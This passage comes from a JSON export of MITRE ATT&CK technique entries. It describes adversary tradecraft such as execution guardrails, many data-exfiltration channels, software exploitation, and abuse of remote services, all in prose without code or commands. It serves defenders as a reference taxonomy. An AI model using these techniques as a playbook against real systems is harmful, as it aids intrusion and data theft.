"description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversarys campaign.<sup>[[FireEye Kevin Mandia Guardrails](https://app.tidalcyber.com/references/0c518eec-a94e-42a7-8eb7-527ae3e279b6)]</sup> Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.<sup>[[FireEye Outlook Dec 2019](https://app.tidalcyber.com/references/f23a773f-9c50-4193-877d-97f7c13f48f1)]</sup>\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ac10844f-e4ab-44a2-97b4-3d74a1fc046c",
"type": "similar"
}
],
"uuid": "aca9cbac-5c11-4050-8d9c-2a947c89a1e8",
"value": "Execution Guardrails"
},
{
"description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1048.002"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "b27b273b-77e7-4243-8b48-a735857c0708",
"value": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"
},
{
"description": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \n\nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1048.001"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "848e3552-e89d-4981-a5a5-eaf610e6eb37",
"value": "Exfiltration Over Symmetric Encrypted Non-C2 Protocol"
},
{
"description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.<sup>[[copy_cmd_cisco](https://app.tidalcyber.com/references/88138372-550f-5da5-be5e-b5ba0fe32f64)]</sup>\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1048.003"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "27041aa4-13e7-4d84-b1c7-02047beb5534",
"value": "Exfiltration Over Unencrypted Non-C2 Protocol"
},
{
"description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88) can be done using various common operating system utilities such as [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc)/SMB or FTP.<sup>[[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)]</sup> On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5).",
"meta": {
"platforms": [
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
},
{
"dest-uuid": "b27b273b-77e7-4243-8b48-a735857c0708",
"type": "similar"
},
{
"dest-uuid": "848e3552-e89d-4981-a5a5-eaf610e6eb37",
"type": "similar"
},
{
"dest-uuid": "27041aa4-13e7-4d84-b1c7-02047beb5534",
"type": "similar"
}
],
"uuid": "192d25ea-bae1-48e4-88de-e0acd481ab88",
"value": "Exfiltration Over Alternative Protocol"
},
{
"description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "89203cae-d3f1-4eef-9b5a-29042eb05d19",
"value": "Exfiltration Over C2 Channel"
},
{
"description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.\n\nAdversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1011.001"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "38cfe608-a7e3-4e4f-9e2d-6a6ab14946f9",
"value": "Exfiltration Over Bluetooth"
},
{
"description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
},
{
"dest-uuid": "38cfe608-a7e3-4e4f-9e2d-6a6ab14946f9",
"type": "similar"
}
],
"uuid": "d8541e2d-6bdd-4ec0-95c4-c0f657502d5f",
"value": "Exfiltration Over Other Network Medium"
},
{
"description": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1052.001"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "f424dade-21f3-4269-9940-ce64d93b97c4",
"value": "Exfiltration over USB"
},
{
"description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
},
{
"dest-uuid": "f424dade-21f3-4269-9940-ce64d93b97c4",
"type": "similar"
}
],
"uuid": "36e0e8c0-ed8c-42b5-8bbf-b7cb322bc26f",
"value": "Exfiltration Over Physical Medium"
},
{
"description": "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.<sup>[[RedHat Webhooks](https://app.tidalcyber.com/references/37321591-40fd-537e-ba74-71042bc5064e)]</sup> Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.<sup>[[Discord Intro to Webhooks](https://app.tidalcyber.com/references/bf5b3773-29cc-539a-a0f0-a6d1d63dee2d)]</sup> When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. \n\nAdversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://app.tidalcyber.com/technique/26abc19f-5968-45f1-aa1f-f35863a2f804) of emails, chat messages, and other data.<sup>[[Push Security SaaS Attacks Repository Webhooks](https://app.tidalcyber.com/references/519693e2-71c9-55d2-98fd-be451837582a)]</sup> Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.<sup>[[Microsoft SQL Server](https://app.tidalcyber.com/references/a904fde8-b8f9-5411-ab46-0dacf39cc81f)]</sup>\n\nAccess to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.<sup>[[CyberArk Labs Discord](https://app.tidalcyber.com/references/4b3cd2c0-fd0b-5583-8746-648229fc5f9d)]</sup><sup>[[Talos Discord Webhook Abuse](https://app.tidalcyber.com/references/affa93d8-5c8b-557d-80b4-1366df13d77a)]</sup><sup>[[Checkmarx Webhooks](https://app.tidalcyber.com/references/f68f1151-839e-5ae7-bab1-aa2b4c0d11ec)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1567.004"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "4c34fe8b-ea13-55f9-9a2f-5948e2a2ecca",
"value": "Exfiltration Over Webhook"
},
{
"description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1567.002"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "ce886c55-17ab-4c1c-90dc-3aa93e69bdb4",
"value": "Exfiltration to Cloud Storage"
},
{
"description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\n\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1567.001"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1",
"value": "Exfiltration to Code Repository"
},
{
"description": "Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used by developers to share code and other information. \n\nText storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://app.tidalcyber.com/technique/ec2a76e6-3530-43e1-9e80-686e4b214ac8)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.<sup>[[Pastebin EchoSec](https://app.tidalcyber.com/references/3fc422e5-9a1d-5ac4-8e65-1df13d8a688e)]</sup>\n\n**Note:** This is distinct from [Exfiltration to Code Repository](https://app.tidalcyber.com/technique/c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1), which highlight access to code repositories via APIs.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1567.003"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "8b6743e7-e856-5772-8b38-2c002602b365",
"value": "Exfiltration to Text Storage Sites"
},
{
"description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
},
{
"dest-uuid": "4c34fe8b-ea13-55f9-9a2f-5948e2a2ecca",
"type": "similar"
},
{
"dest-uuid": "ce886c55-17ab-4c1c-90dc-3aa93e69bdb4",
"type": "similar"
},
{
"dest-uuid": "c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1",
"type": "similar"
},
{
"dest-uuid": "8b6743e7-e856-5772-8b38-2c002602b365",
"type": "similar"
}
],
"uuid": "66768217-acdd-4b52-902f-e29483630ad6",
"value": "Exfiltration Over Web Service"
},
{
"description": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) and [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "068df3d7-f788-44e4-9e6b-2ae443af1609",
"value": "Exploitation for Client Execution"
},
{
"description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. \n\nCredentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.<sup>[[Technet MS14-068](https://app.tidalcyber.com/references/db78c095-b7b2-4422-8473-49d4a1129b76)]</sup><sup>[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]</sup> Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.<sup>[[Bugcrowd Replay Attack](https://app.tidalcyber.com/references/ed31056c-23cb-5cb0-9b70-f363c54b27f7)]</sup><sup>[[Comparitech Replay Attack](https://app.tidalcyber.com/references/a9f0b569-8f18-579f-bf98-f4f9b93e5524)]</sup><sup>[[Microsoft Midnight Blizzard Replay Attack](https://app.tidalcyber.com/references/5af0008b-0ced-5d1d-bbc9-6c9d60835071)]</sup>\n\nSuch exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.<sup>[[Storm-0558 techniques for unauthorized email access](https://app.tidalcyber.com/references/74fd79a9-09f7-5149-a457-687a1e2989de)]</sup>\n\nExploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.",
"meta": {
"platforms": [
"Azure AD",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "afdfa503-0464-4b42-a79c-a6fc828492ef",
"value": "Exploitation for Credential Access"
},
{
"description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\n\nThere have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries <sup>[[Salesforce zero-day in facebook phishing attack](https://app.tidalcyber.com/references/cbd360bb-f4b6-5326-8861-b05f3a2a8737)]</sup>, evade security logs <sup>[[Bypassing CloudTrail in AWS Service Catalog](https://app.tidalcyber.com/references/de50bd67-96bb-537c-b91d-e541a717b7a1)]</sup>, or deploy hidden infrastructure.<sup>[[GhostToken GCP flaw](https://app.tidalcyber.com/references/3f87bd65-4194-5be6-93a1-acde6eaef547)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "15b65bf2-dbe5-47bc-be09-ed97684bf391",
"value": "Exploitation for Defense Evasion"
},
{
"description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup><sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup> Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) or [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f).",
"meta": {
"platforms": [
"Containers",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "9cc715d7-9969-485f-87a2-c9f7ed3cc44c",
"value": "Exploitation for Privilege Escalation"
},
{
"description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://app.tidalcyber.com/technique/5bab1234-8d1e-437f-88a0-d527b2dfc6cd) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB <sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup> and RDP <sup>[[NVD CVE-2017-0176](https://app.tidalcyber.com/references/82602351-0ab0-48d7-90dd-f4536b4d009b)]</sup> as well as applications that may be used within internal networks such as MySQL <sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup> and web server services.<sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup>\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) as a result of lateral movement exploitation as well.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "51ff4ada-8a71-4801-9cb8-a6e216eaa4e4",
"value": "Exploitation of Remote Services"
},
{
"description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.<sup>[[NVD CVE-2016-6662](https://app.tidalcyber.com/references/1813c26d-da68-4a82-a959-27351dd5e51b)]</sup><sup>[[CIS Multiple SMB Vulnerabilities](https://app.tidalcyber.com/references/76d9da2c-1503-4105-b017-cb2b69298296)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup><sup>[[NVD CVE-2014-7169](https://app.tidalcyber.com/references/c3aab918-51c6-4773-8677-a89b27a00eb1)]</sup> Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://app.tidalcyber.com/technique/bebaf25b-9f50-4e3b-96cc-cc55c5765b61), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.<sup>[[Mandiant Fortinet Zero Day](https://app.tidalcyber.com/references/7bdc5bbb-ebbd-5eb8-bd10-9087c883aea7)]</sup><sup>[[Wired Russia Cyberwar](https://app.tidalcyber.com/references/28c53a97-5500-5bfb-8aac-3c0bf94c2dfe)]</sup>\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.<sup>[[OWASP Top 10](https://app.tidalcyber.com/references/c6db3a77-4d01-4b4d-886d-746d676ed6d0)]</sup><sup>[[CWE top 25](https://app.tidalcyber.com/references/d8ee8b1f-c18d-48f3-9758-6860cd31c3e3)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a",
"value": "Exploit Public-Facing Application"
},
{
"description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) and [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) can also be used externally.<sup>[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)]</sup>\n\nAccess to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.<sup>[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)]</sup> Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesnt require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.<sup>[[Trend Micro Exposed Docker Server](https://app.tidalcyber.com/references/05c8909c-749c-4153-9a05-173d5d7a80a9)]</sup><sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup>",
"meta": {
"platforms": [
"Containers",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4",
"value": "External Remote Services"
},
{
"description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1",
"value": "Fallback Channels"
},
{
"description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.<sup>[[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)]</sup> Custom tools may also be used to gather file and directory information and interact with the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560). Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "1492c4ba-c933-47b8-953d-6de3db8cfce8",
"value": "File and Directory Discovery"
},
{
